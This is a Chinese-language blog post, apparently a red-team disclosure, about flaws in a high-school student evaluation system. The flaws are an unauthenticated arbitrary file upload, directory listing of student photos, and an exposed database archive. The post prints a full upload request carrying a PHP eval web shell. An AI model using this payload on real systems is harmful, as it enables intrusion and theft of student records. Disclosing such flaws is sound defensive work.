首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >高中学生综合素质评价系统脆弱性

高中学生综合素质评价系统脆弱性

作者头像
全栈工程师修炼指南
发布2020-10-23 16:47:13
发布2020-10-23 16:47:13
5930
举报

注意:本文分享给安全从业人员,网站开发人员和运维人员在日常工作中使用和防范恶意攻击,请勿恶意使用下面描述技术进行非法操作。

0x00 前言

描述:在护网行动中遇到的一些教育行业系统漏洞总结;该系统大多在学校内网里面基本不向外界所以一般对于其很少爆出漏洞;

0x01 漏洞详细
(1) 任意文件上传

描述:在登录xxx市高中学生综合素质评价系统之后在个人资料处有一个上传头像,测试发现存在任意上传并成功利用取得shell; 通过对代码的分析发现并没有验证任何权限 /Website/MultiuploadFiles.php (采用zend加密但是可以解密)

WeiyiGeek.

直接未登录访问:http://xxoo:8080/MultiuploadFiles.php / uploadimg.php,然后上传一个图片用burp截包代码验证了 Content-Type

代码语言:javascript
复制
#POST请求
POST /MultiuploadFiles.php?action=act HTTP/1.1
Host: *.*.*.*:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://*.*.*.*:8080/MultiuploadFiles.php
Cookie: PHPSESSID=q7f4cjpdtpg97e9mn9diqi4p05
X-Forward-For: 127.0.0.1'
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------64873175618108
Content-Length: 818

-----------------------------64873175618108
Content-Disposition: form-data; name="afile"; filename="test.php"
Content-Type: image/jpeg

<?php echo(2333334-1);eval($_POST[0]);?>
-----------------------------64873175618108
Content-Disposition: form-data; name="button"

提交
-----------------------------64873175618108--
目录遍历

描述: 目录遍历导致的照片泄漏的问题 http://xxoo.com/upload/;

WeiyiGeek.

数据库下载

描述:http://xxoo.com/database/data.zip

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2020/10/10 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x00 前言
  • 0x01 漏洞详细
    • (1) 任意文件上传
  • 目录遍历
  • 数据库下载
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档